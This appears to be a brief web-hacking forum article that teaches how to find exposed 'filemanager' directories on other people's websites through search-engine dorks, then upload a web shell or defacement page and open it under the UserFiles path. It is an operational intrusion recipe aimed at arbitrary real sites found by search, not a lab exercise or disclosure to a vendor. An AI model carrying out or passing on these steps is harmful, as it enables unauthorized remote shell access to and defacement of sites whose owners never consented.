Main » Articles » Web Hacking » Exploits and Vulenrablities |
"File Manager" ~ Remote Shell and Deface upload Vulnerability
"File Manager" ~ remote shell and deface upload vulnerability Dorks : inurl:/filemanager/userfiles/ filetype:pdf inurl:/filemanager/index.html Exploit : http://www.site.com/filemanager/index.html Lets Start ! Open google or bing and type dork inurl:/filemanager/userfiles/ filetype:pdf or inurl:/filemanager/index.html Now select any website from search results after clicking on website url will be http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf Now Delete keywords after file manager For example : Before : http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf After : http://www.site.com/filemanager/ Now find upload option there and upload your shell or deface Page there you file will upload in userfiles directory To View your upload shell or file goto http://www.site.com/UserFiles/Shell.php http://www.site.com/UserFiles/deface.html or http://www.site.com/UserFiles/directory/Shell.php http://www.site.com/UserFiles/directory/deface.html
| |
Views: 875 | Rating: 4.0/2 |
Total comments: 0 | |